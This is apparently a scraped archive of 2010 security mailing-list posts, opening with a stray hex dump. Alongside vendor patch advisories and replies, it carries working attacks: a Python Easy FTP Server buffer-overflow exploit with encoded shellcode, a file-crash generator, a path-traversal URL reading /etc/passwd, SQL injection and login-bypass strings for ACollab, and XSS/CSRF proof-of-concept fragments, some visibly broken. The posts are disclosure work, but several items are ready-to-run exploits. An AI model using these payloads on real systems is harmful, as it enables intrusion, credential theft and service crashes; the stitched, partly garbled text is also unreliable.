0036a9da  90 90 90 90 90 90 8b 44-24 04 33 c9 33 d2 8b 00  ...D$.3.3...

0036a9ea  8a 68 15 8a 50 13 8a 48-14 c1 e1 08 0b ca 33 d2  .h..P..H..3.

0036a9fa  8a 50 12 c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90  .P..

0036aa0a  90 90 90 90 90 90 56 8b-74 24 08 85 f6 74 54 57  ..V.t$...tTW

0036aa1a  b9 5a 00 00 00 33 c0 8b-fe f3 ab 68 00 40 00 00  .z...3...@..

0036aa2a  c7 46 04 00 40 00 00 e8-18 11 00 00 68 00 10 00  @...h...







PoC Start##

print "\nXilisoft Video Converter Wizard 3 ogg file processing DoS"



#Download from

# 
http://www.downloadatoz.com/xilisoft-video-converter/order.php?download=xilisoft-video-converter&url=downloadatoz.com/xilisoft-video-converter/wizard.html/__xilisoft-video-converter__d1

#http://www.downloadatoz.com/xilisoft-video-converter/wizard.html



buff = "D" * 8400



try:

oggfile = open("XilVC_ogg_crash.ogg","w")

oggfile.write(buff)

oggfile.close()

print "[+]Successfully created ogg file\n"

print "[+]Coded by Praveen Darshanam\n"

except:

print "[+]Cannot create File\n"



PoC End

XSS vulnerability in CMSimple

2010-08-16 Thread advisory

Vulnerability ID: HTB22559
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cmsimple_1.html
Product: CMSimple
Vendor: Peter Andreas Harteg ( http://www.cmsimple.org/ ) 
Vulnerable Version: 3.3 and Probably Prior Versions
Vendor Notification: 02 August 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/cmsimple/adm.php" script to 
properly sanitize user-supplied input in "text" variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:

http://host/"; method="post" name="main" >







document.main.submit();

XSRF (CSRF) in CMSimple

2010-08-16 Thread advisory

Vulnerability ID: HTB22561
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_cmsimple.html
Product: CMSimple
Vendor: Peter Andreas Harteg ( http://www.cmsimple.org/ ) 
Vulnerable Version: 3.3 and Probably Prior Versions
Vendor Notification: 02 August 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/cmsimple/adm.php" script to 
properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is 
available:

http://host/"; method="post"  name="main" >

































document.main.submit();

XSS vulnerability in pimcore

2010-08-16 Thread advisory

Vulnerability ID: HTB22562
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pimcore.html
Product: pimcore
Vendor: elements.at New Media Solutions GmbH. ( http://www.pimcore.org/ ) 
Vulnerable Version: 1.1.0 and Probably Prior Versions
Vendor Notification: 02 August 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the page saving script to properly 
sanitize user-supplied input in "data" variable. Successful exploitation of 
this vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:

http://host/admin/page/save/task/publish"; method="post"  
name="main" >






document.main.submit();

[ MDVSA-2010:151 ] libmikmod

2010-08-16 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:151
 http://www.mandriva.com/security/
 ___

 Package : libmikmod
 Date: August 16, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in libmikmod:
 
 Multiple heap-based buffer overflows might allow remote attackers
 to execute arbitrary code via (1) crafted samples or (2) crafted
 instrument definitions in an Impulse Tracker file (CVE-2009-3995).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3995
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3996
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2546
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2971
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 3239adc6a61914a960c8bb07ebab58d2  
2008.0/i586/libmikmod2-3.1.11a-8.2mdv2008.0.i586.rpm
 4a88081c44652b1abbb2168bad46fc17  
2008.0/i586/libmikmod-devel-3.1.11a-8.2mdv2008.0.i586.rpm 
 ecdb3414bb5ff4fde670f2983432fe92  
2008.0/SRPMS/libmikmod-3.1.11a-8.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 41d721fc0ade6181626d66527e08260f  
2008.0/x86_64/lib64mikmod2-3.1.11a-8.2mdv2008.0.x86_64.rpm
 b9af3c6d02828c7c36f2d47275142a01  
2008.0/x86_64/lib64mikmod-devel-3.1.11a-8.2mdv2008.0.x86_64.rpm 
 ecdb3414bb5ff4fde670f2983432fe92  
2008.0/SRPMS/libmikmod-3.1.11a-8.2mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 0c32865a362e5949549bd0597f1c3288  
2009.0/i586/libmikmod3-3.2.0-0.beta2.2.2mdv2009.0.i586.rpm
 1f0c55a841c82430a4a455b9c0fd185f  
2009.0/i586/libmikmod-devel-3.2.0-0.beta2.2.2mdv2009.0.i586.rpm 
 3b736a5f6560c844e05d797772240ff8  
2009.0/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 da510127c478758616146f2069b013ca  
2009.0/x86_64/lib64mikmod3-3.2.0-0.beta2.2.2mdv2009.0.x86_64.rpm
 ce57822efa45f0e36aa1d79f7cc75763  
2009.0/x86_64/lib64mikmod-devel-3.2.0-0.beta2.2.2mdv2009.0.x86_64.rpm 
 3b736a5f6560c844e05d797772240ff8  
2009.0/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 1987e95ad4486d0d70a5cb3f15462815  
2009.1/i586/libmikmod3-3.2.0-0.beta2.3.1mdv2009.1.i586.rpm
 7c1d6e99214eca60d5e1b27d742557ac  
2009.1/i586/libmikmod-devel-3.2.0-0.beta2.3.1mdv2009.1.i586.rpm 
 2cf8f0a1794e134bad1f0510a4d4b255  
2009.1/SRPMS/libmikmod-3.2.0-0.beta2.3.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 06d66faa37c282dbee789de65dc5b246  
2009.1/x86_64/lib64mikmod3-3.2.0-0.beta2.3.1mdv2009.1.x86_64.rpm
 5940b272dda3c628bbf27799e43db079  
2009.1/x86_64/lib64mikmod-devel-3.2.0-0.beta2.3.1mdv2009.1.x86_64.rpm 
 2cf8f0a1794e134bad1f0510a4d4b255  
2009.1/SRPMS/libmikmod-3.2.0-0.beta2.3.1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 754014cea8f3645395151dc2b7a4cc58  
2010.0/i586/libmikmod3-3.2.0-0.beta2.6.1mdv2010.0.i586.rpm
 cd1e7fca287c53499d973478c7813a6f  
2010.0/i586/libmikmod-devel-3.2.0-0.beta2.6.1mdv2010.0.i586.rpm 
 9db426850551cd0d47d49dce62bddf29  
2010.0/SRPMS/libmikmod-3.2.0-0.beta2.6.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 477871f309a92d2912811fb31fea0943  
2010.0/x86_64/lib64mikmod3-3.2.0-0.beta2.6.1mdv2010.0.x86_64.rpm
 4c02e2863a04a2201233ce6f0822fbb5  
2010.0/x86_64/lib64mikmod-devel-3.2.0-0.beta2.6.1mdv2010.0.x86_64.rpm 
 9db426850551cd0d47d49dce62bddf29  
2010.0/SRPMS/libmikmod-3.2.0-0.beta2.6.1mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 5dc9e3bcb87870d04daaeea37c1c7c90  
2010.1/i586/libmikmod3-3.2.0-0.beta2.7.1mdv2010.1.i586.rpm
 30fd5e1c50381c01c621c67f83e46c53  
2010.1/i586/libmikmod-devel-3.2.0-0.beta2.7.1mdv2010.1.i586.rpm 
 a8e35035a0439a36aed7acb4c6cd8c66  
2010.1/SRPMS/libmikmod-3.2.0-0.beta2.7.1mdv2010.1.src.rpm

 Mandriva Linux 2010.1/X86_64:
 c642403d884dcd4aef507757d7688b4a  
2010.1/x86_64/lib64mikmod3-3.2.0-0.beta2.7.1mdv2010.1.x86_64.rpm
 b64cda55aeb0450fea2ad3af07fece31  
2010.1/x86_64/lib64mikmod-devel-3.2.0-0.beta2.7.1mdv2010.1.x86_64.rpm 
 a8e35035a0439a36aed7acb4c6cd8c66  
2010.1/SRPMS/libmikmod-3.2.0-0.beta2.7.1mdv2010.1.src.rpm

 Mandriva Enterprise Server 5:
 6798c40fffe0cec1532ed4ea2470b041  
mes5/i586/libmikmod3-3.2.0-0.beta2.2.2mdvmes5.1.i586.rpm
 2b4f452bcfcd7ccbc1f9eea217b3e8ed  
mes5/i586/libmikmod-devel-3.2.0-0.beta2.2.2mdvmes5.1.i586.rpm 
 18ee204b5ffc212d4fb027b912a75c0b  
mes5/SRPMS/libmikmod-3.2.0-0.beta2.2.2mdvmes5.1.src.rpm

Re: Re: Amblog 1.0 Joomla Component Multiple SQL Injection Vulnerabilities

2010-08-16 Thread Salvatore Fresta aka Drosophila

No, it isn't a good idea. You can use always Jrequest::getVar
specifing the type
(http://api.joomla.org/Joomla-Framework/Environment/JRequest.html#getVar).

The allowed types are: INT, FLOAT, BOOLEAN, WORD, ALNUM, CMD, BASE64,
STRING, ARRAY, PATH.

Regards.

-- 
Salvatore Fresta aka Drosophila
http://www.salvatorefresta.net
CWNP444351

Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

2010-08-16 Thread Salvatore Fresta aka Drosophila


Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

 Name  Jgrid
 Vendorhttp://datagrids.clubsareus.org
 Versions Affected 1.0

 AuthorSalvatore Fresta aka Drosophila
 Website   http://www.salvatorefresta.net
 Contact   salvatorefresta [at] gmail [dot] com
 Date  2010-08-14

X. INDEX

 I.ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.FIX
 

I. ABOUT THE APPLICATION


DATA GRID Component built on the popular EXTJS Framework.


II. DESCRIPTION
___

A parameter is not properly sanitised before being  used
by the require_once function.


III. ANALYSIS
_

Summary:

 A) Local File Inclusion
 

A) Local File Inclusion
___

The  controller  parameter in jgrid.php is not  sanitised
before  being  used by the PHP function's require_once().
This allows a guest to include local files. The following
is the affected code:

if($controller = JRequest::getVar('controller')) {
require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}


IV. SAMPLE CODE
___

A) Local File Inclusion

http://site/path/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00


V. FIX
__

No fix.

Insecure secure cookie in Tornado

2010-08-16 Thread Nam Nguyen

BLUE MOON SECURITY ADVISORY 2010-01
===


:Title: Insecure secure cookie in Tornado
:Severity: Low
:Reporter: Blue Moon Consulting
:Products: Tornado v1.0
:Fixed in: Tornado v1.0.1


Description
---

Tornado is an open source version of the scalable, non-blocking web server and 
tools that power FriendFeed.

A secure cookie in Tornado is stored in three parts, separated by a pipe sign 
(``|``)

::

  ||

where:


  is the cookie's value encoded in Base64, which does use the digits 0 to 9.


  is ``str(int(time.time()))``.


  is the keyed hash value of  and  concatenated.

The problem is ``get_secure_cookie`` only checks for expired timestamp and the 
 does not take into account the separator character. An attacker, 
therefore, can move the pipe sign to the left by 4-character blocks to create 
another valid cookie, whose timestamp is in the far future, and value truncated 
by 3 characters.

This vulnerability is rated at low severity due to situational exploiting 
conditions.

Workaround
--

There is no workaround.

Fix
---

Customers are advised to upgrade to at least version 1.0.1.

Disclosure
--

Blue Moon Consulting adapts `RFPolicy v2.0 
`_ in notifying vendors.

:Initial vendor contact:

  August 13, 2010: Notice sent to Ben Darnell.

:Vendor response:

  August 13, 2010: Ben replied confirming the bug.

:Further communication:

  August 13, 2010: Ben added that the attacker would have to shift by 4 digits 
due to Base64 encoding.
  
  August 13, 2010: Ben added that version 1.0.1 would have a timestamp check.

:Public disclosure: August 16, 2010

:Exploit code:

  No exploit code required.

Disclaimer
--

The information provided in this advisory is provided "as is" without warranty 
of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either 
express or implied, including the warranties of merchantability and fitness for 
a particular purpose. Your use of the information on the advisory or materials 
linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd 
reserves the right to change or update this notice at any time.


-- 
Nam Nguyen, CISA, CISSP, CSSLP
Blue Moon Consulting Co., Ltd
http://www.bluemoon.com.vn


pgpViSGwRhzlO.pgp
Description: PGP signature

Re: XSS vulnerability in Eden Platform

2010-08-16 Thread security curmudgeon


: Product: Eden Platform
: Vendor: Preation ( http://www.preation.com/ ) 
: Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions
: Risk level: Medium 

The vendor web page has a free trial feature, with no obvious version. 
Your version of 01.07.2010 appears to be something you designated, perhaps 
based on the date you notified the vendor.

It appears this is a site specific issue in Preation / Eden.

Can you confirm this is a downloadable product and the version affected?

Re: XSS vulnerability in Theeta CMS

2010-08-16 Thread security curmudgeon


: Vulnerability ID: HTB22489
: Reference: 
http://www.htbridge.ch/advisory/xss_vulnerability_in_theeta_cms_2.html
: Vendor: MN Tech Solutions
: Vulnerable Version: 0.0

: The vulnerability exists due to failure in the "forum.php" script to 
: properly sanitize user-supplied input in "forum" variable. Successful 
: exploitation of this vulnerability could result in a compromise of the 
: application, theft of cookie-based authentication credentials, 
: disclosure or modification of sensitive data.

Disclosed on 2009-12-01 by c0dy[at]r00tDefaced.net, and assigned 
CVE-2009-4782.

Re: XSS vulnerability in WebPress

2010-08-16 Thread security curmudgeon


: Product: WebPress
: Vendor: YWP ( http://www.goywp.com/ ) 
: Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions

The vendor web page has a demo feature, that is powered by "YWP 13.00.04". 
Creating a demo via their site, the changelog shows "05.05.2010 - Released 
version 13.00.04". Your version of 01.07.2010 appears to be something you 
designated, based on the date you notified the vendor.

It appears this is a site specific issue in YWP (http://www.goywp.com/).

Can you confirm this is a downloadable product and the version affected?

Re: XSS vulnerability in CruxCMS

2010-08-16 Thread security curmudgeon


: Vulnerability ID: HTB22445
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cruxcms.html
: Product: CruxCMS
: Vendor: CruxSoftware
: Vulnerable Version: 3.00 and Probably Prior Versions
: Risk level: Medium 
: Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

: The vulnerability exists due to failure in the "search.php" script to 
: properly sanitize user-supplied input in "search" variable. Successful 
: exploitation of this vulnerability could result in a compromise of the 
: application, theft of cookie-based authentication credentials, 
: disclosure or modification of sensitive data.
: 
: http://host/search.php?search=%27%22%3E%3Cscript%3Ealert%28234%29%3C/script%3E

This was discovered 2008-02-04 by Psiczn and assigned CVE-2008-0700.

Please search your favorite VDB for vulnerabilities before posting 
advisories.

[ MDVSA-2010:150 ] libsndfile

2010-08-16 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:150
 http://www.mandriva.com/security/
 ___

 Package : libsndfile
 Date: August 14, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in libsndfile:
 
 The (1) htk_read_header, (2) alaw_init, (3) ulaw_init, (4) pcm_init,
 (5) float32_init, and (6) sds_read_header functions in libsndfile
 1.0.20 allow context-dependent attackers to cause a denial of service
 (divide-by-zero error and application crash) via a crafted audio file
 (CVE-2009-4835).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4835
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 c93c7c7068d000b91eae61a8c09229c9  
2008.0/i586/libsndfile1-1.0.18-0.pre20.0.2mdv2008.0.i586.rpm
 76dfe39ea12d4a7dfeadb2ec3a844cc4  
2008.0/i586/libsndfile-devel-1.0.18-0.pre20.0.2mdv2008.0.i586.rpm
 acf42bb8cd11016a44cb395ace8e99c1  
2008.0/i586/libsndfile-progs-1.0.18-0.pre20.0.2mdv2008.0.i586.rpm
 944dda961426efd66bd5a2546da06f44  
2008.0/i586/libsndfile-static-devel-1.0.18-0.pre20.0.2mdv2008.0.i586.rpm 
 f5500769668619ffe40b24db7fc4d3fd  
2008.0/SRPMS/libsndfile-1.0.18-0.pre20.0.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 7d180d971b3da58cb75361372651f3e3  
2008.0/x86_64/lib64sndfile1-1.0.18-0.pre20.0.2mdv2008.0.x86_64.rpm
 21afa308fd9532d4d9e6b3fd81544a7d  
2008.0/x86_64/lib64sndfile-devel-1.0.18-0.pre20.0.2mdv2008.0.x86_64.rpm
 0b3ceb2670f62127f92884b3f5c2e134  
2008.0/x86_64/lib64sndfile-static-devel-1.0.18-0.pre20.0.2mdv2008.0.x86_64.rpm
 c7bbba6a5f2b6d3540fb6b22400f5897  
2008.0/x86_64/libsndfile-progs-1.0.18-0.pre20.0.2mdv2008.0.x86_64.rpm 
 f5500769668619ffe40b24db7fc4d3fd  
2008.0/SRPMS/libsndfile-1.0.18-0.pre20.0.2mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 56645881aeec875d661a072abe86c48b  
2009.0/i586/libsndfile1-1.0.18-2.pre22.1.3mdv2009.0.i586.rpm
 08be4bc8a20fd892d43eddd352d2e5e5  
2009.0/i586/libsndfile-devel-1.0.18-2.pre22.1.3mdv2009.0.i586.rpm
 c11393e67f6527e6ff6e4003cef263ec  
2009.0/i586/libsndfile-progs-1.0.18-2.pre22.1.3mdv2009.0.i586.rpm
 3621901a1665cab19f5edcf276f49982  
2009.0/i586/libsndfile-static-devel-1.0.18-2.pre22.1.3mdv2009.0.i586.rpm 
 76b4d09a0602f488c38eca666dd7e28b  
2009.0/SRPMS/libsndfile-1.0.18-2.pre22.1.3mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 fc887d2f087fb70702294dba17722575  
2009.0/x86_64/lib64sndfile1-1.0.18-2.pre22.1.3mdv2009.0.x86_64.rpm
 6baee87b88f90e245f272e8408e13b52  
2009.0/x86_64/lib64sndfile-devel-1.0.18-2.pre22.1.3mdv2009.0.x86_64.rpm
 f8e665f9d1d193b0d8370873d7835579  
2009.0/x86_64/lib64sndfile-static-devel-1.0.18-2.pre22.1.3mdv2009.0.x86_64.rpm
 e6a01db2f7248dabc8284b786bb041d9  
2009.0/x86_64/libsndfile-progs-1.0.18-2.pre22.1.3mdv2009.0.x86_64.rpm 
 76b4d09a0602f488c38eca666dd7e28b  
2009.0/SRPMS/libsndfile-1.0.18-2.pre22.1.3mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 ec8b2916fa28d7248d84d37211b3414e  
2009.1/i586/libsndfile1-1.0.19-1.2mdv2009.1.i586.rpm
 b505744ecf8dc0aea55b15136314cb59  
2009.1/i586/libsndfile-devel-1.0.19-1.2mdv2009.1.i586.rpm
 da9d2c8885a8f8e376209b658065bd1f  
2009.1/i586/libsndfile-progs-1.0.19-1.2mdv2009.1.i586.rpm
 8fa4827a35d0b33f0c7c22ceb088335f  
2009.1/i586/libsndfile-static-devel-1.0.19-1.2mdv2009.1.i586.rpm 
 e22990103ad877308ba7c037c0e04ba5  
2009.1/SRPMS/libsndfile-1.0.19-1.2mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 24a7f6e860fd6490befaa82ce1c61b80  
2009.1/x86_64/lib64sndfile1-1.0.19-1.2mdv2009.1.x86_64.rpm
 f5d77b1c1f83f546b6941c68acd29e4b  
2009.1/x86_64/lib64sndfile-devel-1.0.19-1.2mdv2009.1.x86_64.rpm
 7b3d9f592ce56fb286847e20bdcb7160  
2009.1/x86_64/lib64sndfile-static-devel-1.0.19-1.2mdv2009.1.x86_64.rpm
 3b48c5088456b87d8ece99a3000a90ff  
2009.1/x86_64/libsndfile-progs-1.0.19-1.2mdv2009.1.x86_64.rpm 
 e22990103ad877308ba7c037c0e04ba5  
2009.1/SRPMS/libsndfile-1.0.19-1.2mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 e4487bf36980b6f5d816d8e952204a59  
2010.0/i586/libsndfile1-1.0.20-4.2mdv2010.0.i586.rpm
 b7be27c71f023054b16ecb4acd8e4273  
2010.0/i586/libsndfile-devel-1.0.20-4.2mdv2010.0.i586.rpm
 238e99e278c704ebcf498f72f1413fac  
2010.0/i586/libsndfile-progs-1.0.20-4.2mdv2010.0.i586.rpm
 6c165c55ce51484e8e032e2d573e21a5  
2010.0/i586/libsndfile-static-devel-1.0.20-4.2mdv2010.

Easy FTP Server v1.7.0.11 DELE, STOR, RNFR, RMD, XRMD Command Buffer Overflow

2010-08-16 Thread Glafkos Charalambous

# Exploit Title: Easy FTP Server v1.7.0.11 Multiple Command Buffer Overflow
# Date: August 12, 2010
# Author: Glafkos Charalambous
# Software Link:
http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip
# Version: 1.7.0.11
# Tested on: Windows XP SP3 En
# Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD

import socket
import sys

if len(sys.argv) != 4:
print "Usage: ./easyftp.py   "
print "Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD"
sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]

buffersize = 268
 

# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe

shellcode = ("\xd9\xec\xba\x4c\x61\x82\xbc\xd9\x74\x24\xf4\x33\xc9\xb1\x33"
"\x58\x31\x50\x17\x83\xe8\xfc\x03\x1c\x72\x60\x49\x60\x9c\xed"
"\xb2\x98\x5d\x8e\x3b\x7d\x6c\x9c\x58\xf6\xdd\x10\x2a\x5a\xee"
"\xdb\x7e\x4e\x65\xa9\x56\x61\xce\x04\x81\x4c\xcf\xa8\x0d\x02"
"\x13\xaa\xf1\x58\x40\x0c\xcb\x93\x95\x4d\x0c\xc9\x56\x1f\xc5"
"\x86\xc5\xb0\x62\xda\xd5\xb1\xa4\x51\x65\xca\xc1\xa5\x12\x60"
"\xcb\xf5\x8b\xff\x83\xed\xa0\x58\x34\x0c\x64\xbb\x08\x47\x01"
"\x08\xfa\x56\xc3\x40\x03\x69\x2b\x0e\x3a\x46\xa6\x4e\x7a\x60"
"\x59\x25\x70\x93\xe4\x3e\x43\xee\x32\xca\x56\x48\xb0\x6c\xb3"
"\x69\x15\xea\x30\x65\xd2\x78\x1e\x69\xe5\xad\x14\x95\x6e\x50"
"\xfb\x1c\x34\x77\xdf\x45\xee\x16\x46\x23\x41\x26\x98\x8b\x3e"
"\x82\xd2\x39\x2a\xb4\xb8\x57\xad\x34\xc7\x1e\xad\x46\xc8\x30"
"\xc6\x77\x43\xdf\x91\x87\x86\xa4\x6e\xc2\x8b\x8c\xe6\x8b\x59"
"\x8d\x6a\x2c\xb4\xd1\x92\xaf\x3d\xa9\x60\xaf\x37\xac\x2d\x77"
"\xab\xdc\x3e\x12\xcb\x73\x3e\x37\xa8\x12\xac\xdb\x01\xb1\x54"
"\x79\x5e")

 
eip = "\x91\xC8\x41\x7E"
nopsled = "\x90" * 16
junk = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))
payload = nopsled+shellcode+junk+eip

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect((target, port))
print "[+] Connected"
except:
print "[!] Connection Failed"
sys.exit(0)
s.recv(1024)

s.send('User ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
print "[+] Sending payload..."
s.send(command +' '+payload+'\r\n')
s.close()


Regards,
Glafkos Charalambous

ACollab Multiple Vulnerabilities

2010-08-16 Thread admin


##www.BugReport.ir
#
#AmnPardaz Security Research Team
#
# Title:ACollab Multiple Vulnerabilities
# Vendor:   http://www.atutor.ca/acollab
# Vulnerable Version:   1.2 (Latest version till now)
# Exploitation: Remote with browser
# Fix:  N/A
###


- Description:


ACollab as described by its vendor is an accessible, open source,  
multi-group, Web-based collaborative
work environment. ACollab is available as a standalone collaborative  
work environment that will run on
its own. ACollab is ideal for groups working at a distance developing  
documentation, collaborating on

research, or writing joint papers.



- Vulnerability:


+--> SQL Injection
	All of the parameters are sanitized correctly before being used in  
SQL queries else of
	the POST parameters 'login' and 'password' in the "sign_in.php" page.  
These parameters
	can be used for injecting arbitrary SQL queries; the 'login'  
parameter is single quoted

and the 'password' parameter is single parenthesized, single quoted.

+--> Authentication Bypass
	The ACollab CMS uses two mechanism for authentication. One for master  
admin user which is
	based on a hard coded username/password initialized in the  
installation process. And a DB-based
	authentication for all other users, including the group  
administrators which can add/remove/edit
	all posts and news and ... from forums and first screen of the  
website. The second authentication

mechanism can be bypassed.


- Exploits/PoCs:


+--> Exploiting The (MySQL) SQL Injection Vulnerability:
	Go to the sign in page at "victim.net/ACollab/sign_in.php" and use  
the following vectors for injecting

your desired SQL query, namely $Q:
  - In the Username field (login POST parameter): ' or $Q or ''='
  - In the Password field (password POST parameter): ') or $Q or (''='

+--> Exploiting The Authentication Bypass Vulnerability:
	You can login as anyone of the registered users of ACollab CMS by  
providing following vector

as username and nothing as password:
  'or''='' limit 1 offset 0 -- '
	Above vector will log you as the first user according to its member  
id order. You can login as other

users, searching for a group administrator account, by following 
vectors:
  'or''='' limit 1 offset 0 -- '
  'or''='' limit 1 offset 1 -- '
  'or''='' limit 1 offset 2 -- '



- Solution:


Add the following command
$_POST['login'] = addslashes ($_POST['login']);  
$_POST['password'] = addslashes ($_POST['password']);

at the line 46 of 'sign_in.php' file.


- Original Advisory:


http://www.bugreport.ir/index_72.htm


- Credit:

AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

iDefense Security Advisory 08.10.10: Microsoft Office RTF Parsing Engine Memory Corruption Vulnerability

2010-08-16 Thread iDefense Labs

iDefense Security Advisory 08.10.10
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 10, 2010

I. BACKGROUND

Microsoft Word is a word processing application from Microsoft Office.
For more information about Microsoft Word, see the following website:
http://office.microsoft.com/en-us/word/default.aspx

Rich-Text Format (RTF) is a document file format developed by Microsoft
for cross-platform document interchange.

II. DESCRIPTION

Remote exploitation of an memory corruption vulnerability in Microsoft's
Office RTF Parsing Engine could allow an attacker to execute arbitrary
code with the privileges of the current user.

During the processing of a RTF document containing certain control
words, the RTF parsing engine may incorrectly read a value from the RTF
file. This value may directly affect the control of execution flow
within the RTF parsing engine.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user who opened a malicious RTF document
with Microsoft Office.

To exploit this vulnerability, a targeted user must load a malicious RTF
file created by an attacker, or simply receive an email containing
malicious RTF content. An attacker typically accomplishes this via
social engineering or injecting content into a compromised, trusted
site.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Microsoft
Word 2003, Microsoft Word 2007, and Microsoft Outlook 2007. A full list
of vulnerable Microsoft products can be found in Microsoft Security
Bulletin MS10-056.

V. WORKAROUND

Microsoft suggested workarounds can be found in Microsoft Security
Bulletin MS10-056.

VI. VENDOR RESPONSE

Microsoft Corp. has released patches which address this issue.
Information about downloadable vendor updates can be found by clicking
on the URLs shown.
http://www.microsoft.com/technet/security/bulletin/MS10-056.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2010-1901 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/11/2009  Initial Vendor Notification
08/11/2009  Initial Vendor Reply
08/10/2010  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by wushi of team509.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2010 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
